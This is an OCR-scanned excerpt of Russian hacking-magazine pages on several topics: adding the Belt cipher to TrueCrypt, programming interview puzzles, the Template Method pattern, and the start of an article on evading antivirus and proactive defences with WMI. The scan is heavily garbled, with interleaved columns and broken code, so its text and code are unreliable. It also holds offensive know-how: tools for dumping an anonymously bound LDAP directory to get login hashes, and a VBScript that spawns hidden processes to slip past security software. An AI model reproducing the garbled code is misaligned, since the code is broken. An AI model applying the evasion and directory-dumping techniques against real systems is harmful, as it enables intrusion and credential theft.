Д алее в файле на х одим стр ок у вида #ifdef TC_WINDOWS_BOOT_ SINGLE _MOD E. В данном макросе у казывается максимальный ра змер key shed ul e при компиляции загрузчика, под д ерживающего
TRUECRYPT
Итак, п ервым делом откры вае м в
MSVS 201 О
солюшн с ТгuеСгурt
в с ег о о д и н а л горитм шифрования . В конце макроса д обавляем
и находим пр оек т Сгурtо, который содержит исходные тексты всех
па ру с трок:
алгоритмов шифрования, исполь зуемых в программе. В этот проект мы добавляем файлы с реализованным нами алгоритмом
Be iT.
#elif defined(TC_WINDOWS_BOOT_BELT) #define MAX_EXPANDED_KEY BELT_KS #endif
Да
лее в любом проекте [например, Mouпt] открываем заголовочный файл Cгypto . h и находим п ере ч исление вида:
enum { NONE AES,
По с ле делаем iпclude заголовочного файла нашей программ
ной реализации шифра BeiT [#iпc l ude ·· в elt.h'"]. С файлом Cгypto.h
е,
з а к ончено.
Переходим к файлу Сгурtо.с , в котором в первую очере д ь на
хо дим объявление массива C i pheгs[] со структурами типа Cipheг.
};
В данный массив добавляем структуру с характеристиками наше г о алгоритма - до строки
Это перечисление содержит идентификаторы используемых
«# ifndef TC_WIN ... >>
дел аем встав ку:
кр ипт о гр афических алгоритмов. Д обавим в него иден т ификатор
BELT,
однако сделаем это д о строки « #ifпd ef
АЛГОРИТМ СТБ
{ BELT, '"BelT
чтобы
(СТБ
34.181.31)'" , 16 , 32 , BELT_KS },
34.101.31-2011
Блочны й алгоритм шифрования
34.101.31-2011,
TC_WIN ... >>,
Bei T,
оnисанный в стандарте СТБ
nоявился на с вет относительно недавно, и в настоящий
128
бит разбивается на четыре
момент принят в качестве стандарта в Белор уссии.
32 -б итн ы х значе ния , с которыми и ведется работа . На рисунке буквой
с блоками длиной
К с индексом обозначаются ра ун давые подключи, которых целы х
128
бит и использует ключи
Belt работа ет длиной 128, 192 или 256
Алгоритм сос тоит из восьми ра у ндов, общая схема каждого раунда
представлена на рисун ке. Блок данны х в
бит.
56
ш тук. Вырабатываются раундавые ключи из основного 256-битного
Конструктивно алгоритм слегка напомина е т ГОСТ
ключа
28147-89-
lk[1] , ... , k[8]1
очень прос то:
в обоих случаях раундавые ключи << вводятся >> путем суммирования
no
модулю 2л32 , после чего применяется блок nодстановки !таблицы
K[ l ]=k[ l ), ... , K[ 8]=k [8], K[ 9)=k[ l ),
K[56 ]=k[ 8]
заме ны в ГОСТ! и осуществляется сдвиг результата на некоторо е число позиций в сторону старших разрядов . Однако есть и существенные р азличия: ГОСТ nостроен на основе се ти Ф ейсте ля , а в ко нструкции
то ест ь n утем семикратного ко пирования .
Belt
Отсчет раундов алгоритма ведется с в переменной
применяется SР - сеть . Как видишь , в алгоритме для пр еоб разования информации
i.
Опер а ц ия
G состоит
1,
номер раунда х ранится
из преобразования 32-разрядного
значения при помощ и блока nодстановки Н и циклического сдвига
применяю тся nростые и легко реализ уемые оnерации: сложение по
nолученного значения на определенное число разрядов вл е во . В ц е лом
модулю 2л32 ,
схема алго ритм а довольно про ста для nрограммной реализации.
XOR ,
циклический сдвиг и замена .
ХАКЕР
090
www.epidemz.net
04 / 159/2 01 2
Тгuе-кри пт о в а н ие
belt_encгypt( unsigned
void {
unsignl!d unsigned unsigned unsigned unsigned int i; unsigned unsigned
_int32 а • _int32 Ь • _int32 с "' _int32 d .. _int32 е;
_intB "'ks, unsigned _int8 '" inBlock, unsigned _intB "' outBlock)
(( unsigned (( unsignl!!:d ((unsigned (( unsigned
_int32 *)inBlock)[0]; _int32 *)inBlock)(l]; _int32 *)inBlock)[2]; _int32 •)inBlock)(З];
_int32 tmp; _int32 • kl!y ,. ( unsigned
К еу 2
р
_intзz •)ks;
.
foг (i
"' 0; i<B; ++i)
{ Ь А • G((~
Н, 5); н, 21); " .. ( unsigne:d _int32 )(o - G((b + key{Keyindex[iJ[2]]), Н, 13)); е ,. (G((b + с + k ey(K e yind e x[i][З)]) , н, 21) " ( unsigned _int32 )(i + 1));
+ key{Keylndex[i)(0]]),
с
"• G(( d + key{Key i ndex[ i )[l])),
Ь
+..
Кеу ,
е;
с " ( unsigned _int32 )(c - е); d +• G((c + key[Keyindex[ i ](4}}), Ь "• G((~ + key(Keyindex[i](S))), с "• G((d + key(Keyindex(i](б]]), SWAP(~, Ь, tm.p); SWAP(c, d, tmp); SWAP(b, с, trrp);
(( unsigned (( unsigned (( unsigned (( unsigned
Н, н,
13); 21);
Н,
5);
се
_int32 •)outBlock)[0) • Ь; _int32 •)outBlock}[l) ,. d; _int32 *)outBlock)[2] • ~ ; _int32 •)outBlock)[З) • с;
с
За шифрование в соответствии с алгоритмом
Первым элементом с т рук т уры
Ре жим работы
BeiT
Cipher
является идентификатор
XTS
в стандарте СТБ
34.101.3 1 lп роверка корректной работы алгоритма
алгоритма, далее идет текстовая строка с его названием, т ре-
шифрования], а также путем шифрования блока данных в режиме
тий элемент- размер блока алгоритма в байтах, далее раз-
XTS, nодсчета CRC32
мер ключа и размер
нения значения контрольной суммы с эталоном. В этот раз опять
key shedule соответственно. Далее следует внести коррективы в массив EncryptionAigorithms[] структур EncryptionAigorithm. Данный массив инициализируется по-разному в зависимости от того, определен ли TC_WINDOWS_BOO T, и нам
о т полученно г о шифрованного текста и срав
отправляю тебя смотреть исхо дник и на диске, так как в програм мировании механизма самотестирования в действительности нет ничего интересного.
необходимо внести nравки в обе его части. В массив добавляем
ПАРА СЛОВ О ГОСТ28147-89
строку !вторая часть массива изменяется аналогично]:
В чистом виде данный алгоритм добавлять в е
{{ BELT,
},
{XTS,
е,
е,
е },
1}
TrueCrypt
нельзя,
та к как используемая в нем программная реализация режима
XTS В данной структуре первым элемен т ом является список исполь
пре дпелагает, что алгоритм шифрования работает с блоками
дл иной
128
бит, в то время как длина блока алгоритма ГОСТ-
зуемых алгоритмов !могут использова ть ся несколько алгоритмов
бита. Как ты уже догадался, это приведет к тому, что п оловина
подряд], затем задается режим работы шифра- в данном случае
данных окажется в открытом виде . Е сть вариант ис п ользовать
указываем
ГОСТ два раза, то есть блок в
XTS !описание данного режима работы смотри на
врезке], а последнее значение является индикатором того, устарел
128
бит разбивать на дв а 64 - бит
ных блока и каждый из них отдельно шифровать п р и помощи
ли алгоритм или нет !устаревшие алгоритмы используются для
ГОСТ, однако данный путь также неприемлем !пре д лагаю тебе
обратной совместимости со старыми версиями TrueCrypt ]. Вт орую
сам о му подумать, почему]. В исходники на диске добавлена поддержка ГОСТ в случае, когд а шифруется по л о в ина блока,
часть массива структур правим аналогичным образом. Далее nереходим к изменению функции
Cipherlnit,
64
которая,
а nоловина - остается незашифрованной. Ясно, что данный
как видно из названия, производит инициализацию ал г оритма
фун кц ионал нельзя исnользовать для защиты ко н фи д енциаль
шифрования. В ходе работы этой функции осуществляется
ных данных!
schedule
key
шифр а, n оэтому смело добавляем в нее код, о т вечающий
ИСХОДНИКИ Tr ueCrypt
за инициализацию нашего алгоритма:
Л и цензия
налагает неко т орые ограничения на исполь
зование кода- при его модификации нео бходимо обязательно
case BE LT :
убрать все логотипы с названием
belt_init (key, ks) ; break;
TrueCrypt,
название модифи
цированной nрограммы не должно содержать строку
а так же должны быть убраны все ссылки на сайт Аналогичным образом модифицируем функции
EncipherB iock
<<truecrypt>>, truecrypt .org lза
исключением окна «О программе»]. В связи с этим, а такж е из
!отвечает за шифрование одного блока открытого текста],
уважения к разработчикам, в исходникахна диске все упоминания
DecipherBiock !отвечает за расшифровку блока]. Кроме того, не
о TrueCrypt изменены на PlainCrypt, а все ссылки ведут на
обходимо подправить некоторые макросы !смотри в исходниках
loca lh ost/.
на диске], чтобы можно было осущес твлят ь шифрование системы алгоритмом
После внесенных изменений осталось, по сути, сделать три вещи- немного поменять н астройки проектов, добавить поддерж ку наших алгоритмов в механизм самотестирова ния
BeiT.
Win7/Vista
версии х64
возникнут проблемы с установкой неподписанных драйверов. Что
Belt.
а также добавить в ресурсы файлы
Также хочу отметить, что у пользователей
!J..t!QJL
TrueCrypt,
bootloader'a с поддержкой
бы заставить драйверы работать корректно, необходимо подписать их тестовой ЭЦП, а также включить специальный тестовый режим. Подробная ин фа о том, как это сделать, есть как на сайте
Microsoft,
так и в свободном доступе в интернете .
С правкой настроек проектов и ресурсов я предлагаю тебе
справиться самостоятельно или посмотреть, как э то сделано
в исходникахна диске !там нет ничего сложно г о]. Что же касается
НАРРУ
END
Вот, собственно, и все. Теперь, немного напрягшись, ты можешь
механизма самотестирования, то тут проверкаосуществляется
поставить себе на службу отличную шифравалку со своими соб
двумя способами: при помощи тестовых векторов, определенных
ственными криптографическими ал г ори т мами. I
ХАКЕР
091
04/1 59/ 201 2
www.epidemz.net
КОДИНГ
П авел Ал ександр ови ч (ivinside.Ыogspot.coml
и на н
ПОДБОРКА ИНТЕРЕСНЫХ
Если тебе н а собеседова н ии или интервью попалась интересная
ЗАДАНИЙ, КОТОРЫХ ДАЮТ
задача- смело присылай ее мне,
НА СОБЕСЕДОВАНИЯХ
нашей мале н ькой рубрики.
разберем ее в следую щ их вы п усках
ХАКЕР
092
www.epidemz.net
04/159/2012
Задачи на собеседованиях
УСЛОВИЕ
>>> myappend( ** a)
Напиши функцию, которая будет пол учать на вход два сп и ска и воз вр а щать словарь, в котором ключи- эле менты первого списка,
а значе ния- эле м е нты второго спис ка или
None, есл и соответ
РЕШЕНИЕ При выполнении программы будет такой вывод:
ствую щий элеме нт отсутствует.
[ 1 , 2 , 3,
»> »>
а
;
[ "а" , "Ь" , "с" ]
ь ; [ 1, 2 ] >>> print dictify(a,b) { "а" :
1,
"Ь" :
2,
"с" :
е]
(е] [е,
е]
В первом случае функция о тр абатывае т в самом обычном режи·
None}
ме и к списку
РЕШЕНИЕ
[1, 2, 3}
просто добавляется новый элемент.
Во втором случае, так как параметров при вызове не задано,
используется nараметр по умолчанию и создается новый объект
Мое первоначальное решение выглядело так:
-пустой сnисок «а», к которому добавляется новый элемент О. В
def dictify(a, Ь): # возвращае м пустой # чем к л ючей i f len(b) > len(a): return {}
третьей строчке снова параметр не задан и используется список, с лова р ь ,
если
э л ементов боль ш е,
созданный при втором вызове функции myappend [J, так как с nи сок- изменяемый объект.
Далее при вызове myappend[*al возникнет исключение: AttгibuteEггoг: ' int' object has по attгibute 'append', потому Ч то функции передается словарь со значениями, а вышеприве д енный
# ко н стру ир уем с л оварь с помощью встроенных # фу н к ци й zi p и di ct dic ; dict(zip(a, Ь)) # до nолняем с ло ва р ь пус тьм и эл ементами, если таковые i f len(b) < len(a): for i in xrange(len(b), len(a)) : dic(a(i]] ; None return di c
сnособ nодразумевает передачу с nи ска . В этом случае правильно было бы сде лать т ак: имеются
а
; [[ 1 , 2 ], 3 ]
myappend( *a) # что эквивалентно такому # myappend(( 1, 2], 3)
в ы зову:
При вызове mya ppend [**al тоже воз ни к н ет исключение, но н е Стоит отметить, что в Pythoп в е р с ии м енее
2.2
е ще не существо
сколько другое: Тур е Е г г ог: myappe nd[J k eywoгds must Ье stгings . В
вало конструктора dict, и с писки превращ а ли сь в слова ри только с
этом случае должен передаваться словар ь и м енованных аргумен
помощью цикла fог:
тов, что, в обще м-т о, и д елается, но с ошибкой: названия ключей словаря должны соответствовать названиям аргументов, то есть
корректный вызов будет выглядеть так :
keys ; [ 'а' , 'Ь' , 'с' ] vals ; [ 1, 2, 3] dic ; {} for (k, v) in zip(keys, vals) dic[k] ; v Тогда я забыл про о дну родственную и более старую встрое нн ую
а ; { 'а ' : [ 1, 2 ], 'num' : 3} myappend(**a) # что эквивал е нтно такому # myappend((1, 2] , 3)
в ы зову:
функцию map, которая применяет заданную функцию к каждому элементу п осле д ователь но с ти. Н о если вместо функ ции ей пере
УСЛОВИЕ
дать N опе, то она пр ос то объе диня ет элементы подобно zip, при
Напиши класс, который х р анит сnисок своих экземп ляр ов и поз во·
этом автомати ч ески запо лняя отсутствующие з нач е ния с л ова ря
ляет итегрировать по ним.
Nопе. В итоге решение з адачки еще больше упрост ило сь:
>>>
а
»>
Ь
; Keeper() ; Keeper() >>> for i in Keeper.list _ in sta nc es() : print i <Keepe r instance at ех ...
def dictify(a, Ь): i f len(b) > len(a): return {} dic ; dic t(map( None, а, Ь)) return dic
РЕШЕНИЕ УСЛОВИЕ
Для решения этой задачки нужно зна ть про такой шаблон
Есть такая функция:
проектирования как декоратор и уметь его nрименять в языке
Python. Вообще говоря, в питоне декоратор- это функция, которая def myappend(a ; [ ] , num a.append(num) print а
применяется к др угой функции для расширения или изменения ее
е) :
поведения. Синтаксис дек ораторов является попросту синтаксиче ским сахаром:
Что будет п ро и схо дить при выполнении следующего кода и
def f( ... ):
почему:
f ; stat icmethod(f )
»> а ; ( 1, 2, 3] » > myappend (а) » > myappend () » > myappend () »> а ; {1 : 2, 3 : 4 } >>> myappend( *a )
ХАКЕР
@staticmethod def f( .. . ):
В этом примере как раз-таки и nоказано применение нужного
093
04/159/2012
www.epidemz.net
КОДИНГ
нам декоратора-
staticmethod,
РЕШЕНИЕ
к оторый превращает обыч н ый
метод класса в статический, то есть теперь этот метод можно
Эта строчка, как ты уже догадался, из результата сканирования
вызывать напрямую, без создания экземпляра класса. В оспол ь зу
емся им при решении за д ачи [список экзе м пляров буд ем хра н ить в
nmap. Она сообщает, что на сканируемой машине открыт !ер-порт 389, на котором расположился LDAP-cepвep . Слова «Anonymous
переменной
Ьind ОК >> как бы намекают нам, что он не простой, а с возмож
instancesl:
ностью анонимного подключения к LDАР-каталогу, то есть без
class Keeper: in stances = [] def _ init_(se lf ) : self.in stances.append (self ) @staticmethod def list_in stan ces(): return Keeper.instanc es
знания пользовательского
Ke eper () Kee per() for i in Kee pe r . li st_in st ance s(): print i
ldapminer -h <iр_а д рес> <оп ци и> -р [port ]: п о умолч а ни ю ра в е н 389 - в [bind ]: имя п ользователя -w [passwo rd] : п араль -Ь [base se arc h]: п оиск по п ользова т е л ю , - d [du mp all ] : получит ~ всю и н фо рма ци ю
DN
и пароля.
Мы этим непременно воспользуемся и попытаемся получить оттуда информацию, среди которой могут быть всякие интересные штуки типа
login:hash,
но в общем случае там может находиться что
уго дно. Для этого существуют специальные программы.
1. ldapminer. Его синтаксис:
а = Ь =
__ iпit __ , которая выполняется при соз д ании экзем пляра класса, к списку instances д обавляется ссылка на наш све жесозданный объект, а функция list_instances возвращает список, В функции
2. luma. Утилита с графическим
который по умолчанию поддерживает итерационный протокол.
интерфейсом, весьма проста в
освоении.
Вывод nрограммы будет примерно такой:
3. ldp. Еще одна
графическая утилита, на этот раз от
4. openldap. Набор консольных ути лит для
<_main __ .Keeper in stance at <__ m a iп __ .Keepe r in stance at
гр у пп е
Microsoft.
взаимодействия с
0 хЫ 2а еd4с>
LDАР-каталогами. Конкретно в нашем случае нужно использо
0 х Ы 2 а ее2с>
вать ldapseaгch. Синтакси с приводитьздесь не буду, он очень уж страшный.
УСЛОВИЕ Как ни странно, во всеми любимом
Что ЭТО И ЧТО С ЭТИМ М ОЖ Н О с д е л ать?
Metasploit до
сих пор нет
модуля для дампа LDАР-каталога, хотя реквест о такой функции
389/t cp open
ldap
(Anonymous bind
был подан около двух лет назад. :Н:
ОК )
В СЛЕДУЮЩЕМ ВЫПУСКЕ 1.
Что будет выведено в результате исполнения программы? Почему?
class А: def __ i nit __ (s elf, name): self . name = name def __de l __ ( self) : print se lf . name,
class Bar: Foo puЬlic :
Bar( int j } { i= new char [ j]; { delete i; } private : cha r * i; -ваr()
}; [A(str( i )) for i in r ange( 3)] for а in аа: del а аа =
void main() Foo* f= new Foo( 100 }; Foo* b= new Bar( 200 }; *f= *b; delete f; delete Ь;
print ' done' # •.•
2.
Перечисли все п робле мы, кото р ые ты ви д иш ь в д а нн ом ко д е:
class Foo
3.
У тебя есть файл [например, access -лo гweb-cepвepal очень большо г о размера. П ользователи часто запрашивают из него строчки по их
puЫic :
номеру. Нужно реализовать функцию, которая бы возвращала строчку
Foo( int j} { i= new int [ j]; - Foo() { delete i; } private : int * i ;
с произвольным номером за время, независимое от номера строчки и
};
размера файла.
4.
Напиши функцию сортировки массива чисел. Если знаешь несколько способов- используй наиболее быстрый из известныхтебе алгорит мов.
ХАКЕР
www.epidemz.net
04/159/2012
ПРОДУКТЬI СО ВСЕГО МИРА*
OT&OPHbiE
Мы з нае м , где в мире н айти сам ы е л уч ши е п родукты . Вы зн ае те , что можете н ай ти и х рядом , п од маркой
www.epidemz.net
TASH
ИНКАПСУЛЯЦИЯ АЛГОРИТМОВ
В
прошлей статье про паттерны << Фасад» и << Адаптер » мы
представили, что работаем над парсером, который со-
бирает инф у с определенных сайтов. Сегодня мы будем продолжать нашу воображаемую работу, что позволит нам
вникнуть в суть другого паттерна объектно-ориентированного программирования под назва н ием << Ш аблонный метод>>. Кон кре тизируем область применения нашей мегатулзы:
она будет ска нить всяческие доски объявлений и форумы. Как
Алгоритмы- это, пожалуй, самое важное в мире кодинга. Любая программа р е ализует какую -то последовательность д ейс тви й
и в большинстве случаев не одну. В ООП алгоритмы имеют такую же значимость, как
и в любом другом виде кодинга , поэтому гуру
объектов и классов придумали специальный патте рн, который позволяет сделать
структура построения интерфейса схожа. На одной странице отображается строго за данно е количество топиков- скажем, тридцать. Если тем в разделе форума больше, чем тридцать, то п ользова т елю показывае т ся навигацио н н ы й элемент,- напри
мер, ссы л ка на следующую с т раницу или п ронумерованный спи сок этих страниц. Таким образом, наш парсер долже н не только проходить по первой странице, но и уметь бегать по соседним,
также со д ержащим нужную нам информацию. Вырисовывает ся вполн е конкретный алгоритм действий: парсер получает адрес страни цы, скачивает ее, выдирает
нужные топики/объявления, ищет адрес следующей страни-
исполь з ование алгоритмов более легким, понятным и гибким .
известно, html-кoд у разных форумных движков разный, но
цы и если его находит, то начинает все сначала . В противном случае, если мы не нашли ссылку на следующую страницу,
парсер зака н чивает свою работу. В коде все это будет выглядеть
www.epidemz.net
Алгоритм
работы
11 .. .
парсера
doSomethingQ;
class Parser
11 ... PrimitiveOperationlQ;
11
PrimltiveOperationlQ
11 .. .
puЫic :
Primitive0peration2Q
PrimitiveOperationlQ;
11 ...
void parsePage(string url)
em plateMethodQ
doAbso lute lyThisQ;
{
11 ...
while ( url ! = "" )
11
полу ч аем
нужные данные
doAbsolutelyThisQ
со с т раницы
getTopicText();
11
ищем
url
=
ссылку
н;~
следующую стр;~ницу
get NextUrl();
private : void ge tTopicText() { Р rim itiveOperation
11 ... get Next Url()
stri п g
10
PrimitiveOperation2Q
{
doSomethingQ
11 ... Ди а гр амма классов п а тт е рн а « Шаблонный м ето д »
У нас есть класс Ра гsег, который имеет основной метод
void getDataO nPag e()
paгsePagell. Этот метод будут вызывать клиенты парсера.
{
Сам paгsePagell реализует алгоритм, описанный выше. Дл я
11 ...
удоб ств а восприятия мы разбили код метода на функции, такие
как get N extUгlll и getTopicTex tll . Н екоторые могут сказать, что
string get Next Url()
лишние вызовы замедляют работу программы, но, во-первых,
{
зто всего лишь п се вдокод !грубо гово р я, блок-схема буквами!,
11 ...
а во-вторых, такое разбиение нам пригодится в будущем.
ПАРСИМ НЕСКОЛЬКО САЙТОВ Наш парсер работает, и все вроде хорошо, но мы не учли о дну
Как видишь, у нас ес ть все тот же метод paгsePagell, который
мале нькую деталь- сайт для сбора информ ации у нас не один,
выполняет основную работу . Так как мы знаем, что так ое на
их несколько . Это нас, правда, не с ильно расстроило, и мы при
следование, полиморфизм и пр очее, то решаем все это круто
нял и сь ваять еще один к л асс.
оптимизировать, создав обще го родителя для двух классов пар
Так как алгоритм, описанный на ми ранее, остался прежним,
серов. Теперь вся наша конструкция выглядит примерно так:
а изменили сь лишь д ета л и реализации,- например, получение ссылки на следую щую с траницу,- то код нашего нового класса
И ерархи я
буде т очень похож на тот, что был в пре дыд ущем.
class BasePa r ser
Па рс е р для
е ще
одного
к лассов
пар е еров
11
сайта
class Par se r5ite2
puЬlic :
virtual void parsePage(string url)
е;
11 puЫic :
void pa rse Page(s tring url)
class ParserSit e l:
puЫic
Ba se Par se r
{
while (url != "" )
puЫic :
void par se Pa ge(s tring url)
11
получаем ну ж ные данные
со
с тр а ницы
while (ur l != "" )
getDataOпPage();
11 url
и щем
=
ссылк у
на
с леду ющу ю
11
с траницу
getNextUrl();
11 url private :
11
ме тод п о
} на з н ач ению ид е нт иче н
Parser : : getTo pi cTe xt
п о л учаем
н уж н ые д а нны е
со ст р а ницы
getTopi cText( );
private :
www.epidemz.net
ищем ссылку
=
на
сле д ующую с т ран иц у
getNextUrl();
",. An IJЬ.st.r~Ct CltJS$ t.h«t i 6 COI'UoiOn to SCVC~"til. g4PtCS in ,",. •lhich playe.t.-.t' р~ау againsot the othe.r.i' , Ьut only one i.t' ",. playJ.Лg at а g~ven t.з..тв .
реализацию на потомков, пометив его как абстрактный . Такой
•1
ход, конечно, внеснекоторый порядок в нашу программу, но
a:ь~tra.ot
Мы сделали paгsePage базовым методом, но переложили
осталась проблема дублирования кода. Реализация процесса
c1as!i Game i
сбора информации очень похожа, а учитывая то, что мы ввели proteote d int
р
le.yersCo unt ;
такие методы как getNextUгlll и тому подобные, мы получаем
вообще идентичный набор символов в теле paгsePagell.
ahstraot void 1nlt.1aliz:Game t );
ПАТТЕРН « ШАБЛОННЫЙ МЕТОД »
ahstr act void make-Play int player );
П аттерн « Шаблонный метод>> призван икапсулировать в себе
ahs:traot 1Joo1ean endOfGame (, :
ahstraot voicl
/*
А
pr i нtUin11er
выполнениенекоторого алгоритма. Мы уже частично реализо
( 1;
вали его, выделив базовый класс для наших парсеров. Следую щим шагом будет непосредственно инкапсуляция. Для этого
·1
ce.-nplacc m~chod :
:fina.l. voicl playOneGarue ' int player.:5 Count ) t Jt is. р Leye[' !I C oнn t 1n1t.1S l lzeGarne ():
1
мы перенесем код метода paгsePagell из дочерних классов
playe: c !ICo un t ;
Paгse г Sitel и PaгseгSite2 в родительский ВаsеРагsег. Благода
int J
whi1c
( endOfGame
О)
t11a ke:P lay ( j ); J -= ( J + ... )
ря тому, что мы уже выделили в отдельные функции некоторые
{
части алгоритма [таки е как получение текста объявления или
поиск ссылки на следую щ ую страницу форума[, то мы немного
playerэCount ;
упростили процесс применения паттерна. Если бы изначально
printtJi nt1er (),
весь код paгsePage был построен без вызова дополнительных
/ 'Now w~ Cdr. ,.-xl.tm(l ol.aвs
t~1is
t 1C'1.s.-<
1и
ordt!l"
t.c• lmplf'>lltf'!иt..
rict;;dl
Monopo!y extends Ga1t1e
/* Impl.ementdt-.l"n
с~
Патт ер н
« Шаблонный
метод•
class BaseParser
necessa.ry conc.reta metJ;ods ,..,
11
void lnitia!izeGe.me J / ' Iza.
.
методов, то нам все равно пришлось бы их писать.
fJdl.'f"!S .
puЬlic :
~ idl..o.~c: топе: у
void parsePage(string url) {
Пример кода паттерна « Шаблонный метод н
while (url !; "" )
void getTopicTex t ()
11 получаем нужные getTopicText ();
{
данные
со
страницы
11 . . 11
ищем ссылку
на
следующую страницу
url ; getNext Url() ;
string get Next Url() {
11 . .
class Parser5ite2:
puЫic
protected : /1 эти части алгоритма должны virtual void getTopicText() virtual string getNextUrl() ;
BaseParser
определить
наследники
е; е;
puЫic :
class ParserSite l:
void parsePage(string url) while (url !; "" ) данные
со
/1 ищем ссылку на следующую url ; getNextUrl();
страницы
страницу
/1
Мы
11
так
/1
функции,
которые
позволяют
/1
специфичныечасти
алгоритма
не
должны
как
изменять метод
базовый
класс
parsePage,
предоставил
для
реализации
нам специальные
реализовать
// void parsePage(string url); protected : /1 эти два метода перео п ределяются //
private : void getTopic Text()
BaseParser
puЫic :
{
/1 получаем нуж н ые getTopic Text();
puЬlic
в субклассе
специфичного для данного
парсера
кода
void getTopicText() {
{
11 . .
11 . . string getNextUrl()
str ing getNextUrl()
{
{
11 ..
11 . .
www.epidemz.net
. .
.ass Par se rSit e2:
puЬlic
Base Parser остановится преждевремен но. Метод должен определяться
/1
структура
класса
ид е н т ичн а
структуре
как виртуальный, чтобы в функции алгоритма базо в ого к л а сса
Par se rSitel
вызывались методы, переопределяемые в дочерних [есл и они переопределяются]. По умолчанию перехватчик возвращает Если взглянуть на код иерархии классов парсеро в, к которому при !Нен наш паттер н, то можно увидеть, что в базовый класс также вы
сены методы getNextUгl ll и getTopicText[] . По умолчанию они имеют
Fals e, тем самым никак не влияя на количество итераций. Н о потомки ВаsеРагsег могут переопределить код перехватчика и тем самым повлиять на ход алгоритма.
стую реализацию, поэтому дочерние классы должны опр еделить,
кой код там будет. Но в общем случае << Ша блонный метод >> допуска
Ко н троль
некий базовый функционал в подобных функциях, таким об ра зом
class ParserSitel:
к оличес т в а
обработанны х puЬlic
страниц
BaseParser
нкретные реализации парсера могут воспользоваться уже готовым
11
дом.
Т еперь контроль за исполнением алгоритма сосредоточен вру-
х одного единственного класса- Ваs е Раг sег. Его наследники •гут лишь менять детали реализации э т о г о алгоритма, которые
рога определен ы в базовом классе. Что нам это дает? Н у, пред
авим, что парсить нам надо не о ди н-два сайта, а сразу сотню . И в
protected :
/1 используем перехватчик / 1 т о есть не вмеwиваемся /1 bool stop Hook();
по умолчанию ,
в
работу цикла
кой-то момент мы решаем за м е н ить итера ц ионный алгоритм на курсивный. С паттерном << Ш аблонный метод>> нам д остаточно из
нить код всего в одно м месте - BasePaгseг::paгsePage[]. Е сли бы
class ParserSite2:
puЫic
BaseParser
вететвеннесть за реализацию основной последовательнос ти дей вий лежала на отдельных к л ассах-парсерах, то нам бы пришлось релопатить тонны исход н иков, прежде чем получим желаемый
11 ..
зультат.
private : int count;
ЕРЕ Х ВАТЧИКИ :сткий контроль алгорит ма- э т о хорошо, но что если нам нужно
остранство для маневра? Е с ли в п оследова т ельности действий
protected :
едусмотрено некоторое ветвление, на которое влияют детали реа
11
зации, то нам потребуются методы-перехватчики [хуки].
bool st op Hook()
До пустим, класс P aгseг5ite1 должен просматривать все страницы
пе р е оnр е деля е м п ерех ватчик
{
рума, а вот Paг se г5 ite2 всего- нав сего первые три . Получается, что ждая конкретная реализация парсера влияет на одно из фундамен
if ( co un t > 3 )
lьных свойс тв алгоритма- работу цикла. Очевидно, что нам надо
return true ; else return false ;
~-то контро лировать ко ли чес тв о итераций, чтобы Paгseг5ite2 оста вился в нужный момент. Н оневозможность изменения поведения
-sePage не дает нам это с д елать. Хуки же позволяют влиять на ход алгоритма и при этом сохранять ;траль над ним в базовом классе. Н емного изменив код метода
11
-sePage[] мы позволим потомкам преждевременно останавливать кл while. Давай взглянем н а код.
void getTopi cT ext() {
тут увеличив аем с ч етч и к отпарсенных с траниц
11 .. . J ехва тчик эss
в
count++;
« Шаблонном методе •
Base Pars er
1/ Мы видим, что Paгse5 ite1 не перегружает хук, и paгsePage
Jlic : void par se Page(string url) { while (url != "" )
nользуется дефолтным вариан т ом. А вот Paгse5ite2 в едет подсчет количества обработанных страниц, и когда их число д остигает трех, перехватчик останавл ив ает цикл.
Если бы в nаттерне << Шаблонный метод>> не было хуков, нам пришло сь бы nереписывать реализацию paгse P age для каждого
11
с
помощью хука
мож н о досрочно завершить
цикл
отдельного класса napcepa, вследствие чего пропал бы прак тически весь смысл его использования, так как мы nотеряли б ы
i f (stopHook()) break ;
контроль над алгоритмом.
ЗАКЛЮЧ Е НИ Е
11 . . .
Н а nрактике n аттер н <<Шаблонный метод >> имеет множество
вариаций. Многие из программистов сами того не зная р еализо вывали это т nаттерн в т ом или ином виде. Н о осно вн ой принциn остается неизменным: <<Шаблонный мето д >> определяет <<ске
>tected :
11
перехватчик
лет >> алго ри тма в методе , оставляя оnределение реализации
virtual bool stop Hook() {ret ur n f alse;};
н екоторых ш агов субклассам. С убклассы же, в с в ою очередь,
11 ..
м огут переоnределять некоторые части алгоритма без измене ния его структуры. ::Х::
От метода stopHook[] зависи т, будет ли цикл работать дальше или
www.epidemz.net
_
,,
КОДИНГ
Ал екса ндр Экке рт (stannic.manlagmail.coml
8
8
о ход защит НЕОЖИДАННЫЙ ВЗГЛЯД НА ПРИВЫЧНЫЕ В Е ЩИ Как это часто бывает, самое интересное и увлекательное просто валяется
под ногами . Сегодня мы рассмотрим помощи средств, входящи х в стандартную
Windows .
оговорим о Windows Management lnstгume n tation [W MI ),
но с несколько неnривычной точки зрения. Собственно,][
уже nисал на эту тему- как можно nриспоеобить сре д ства
WMI для своих нужд [ xakep.гu/magaz~ne/xa/118/030/1 . asp l. Б удем
во з можность обхода проактивны х з ащит при компл е ктацию ОС
n
считать эту статью nродолжением написанного ранее.
ЛОМАЯ БРОНЬ ПРОАКТИВНЫХ ЗАЩИТ Насколько я знаю, скрипты WM I исnользует в своей работе лишь один человек из десяти. И это в лучшем случае. А ведь зря l Это удобное и мощное средство.
Ну и что ту т такого
интересного,- скаже шь ты,- По большей час т и W MI пред назначен для сбора информации о компьютере и выполне н ия нехитрых приемов админис т рирования. Я бы с тобой согла сился, если бы не два <<НО>>, которые наглядно демонс т рируют, как можно использовать всю мощь
WMI для создан и я кумуля
тивных зарядов, пробивающих бронь антивирусов и проактив ных защит.
П ервое- это возможность созда ния нужного тебе процесса. Каким образом?
Const SW_NORМAL 1 Const SW_HIDE = 0 strComp uter = ", " strCommand = "notepad.exe" Set ob j WMI Service = GetObject ( "winmgmts:"
& "{impersonationlevel=impersoпate}! \\ " & strComputer & "\ root \ cimv2" ) Set objStartup = objWMIService.Get( "Win32_ProcessStartup " ) Set objConng = objStartup.Spawnin sta nce_ objConng.ShowWindow = SW_NORМA L
Н е видимый
Notepad
Set obj Process = objWMIService.Get( "Win32_Process " ) intRetur n = objProcess . Create _ (st r Command, Nul l, objConfig, intP r ocessiD )
ХАКЕР
100
www.epidemz.net
04/159/ 2012
WMI: обход за щит
1":"~· :I WII"ФФ
D: ,Doc u l'le n t!> and Setti n g:;'R'н~t~c)tlnic C.R 11 Ct•eateJ<ey )IDefKey= "&H80blOfi002"
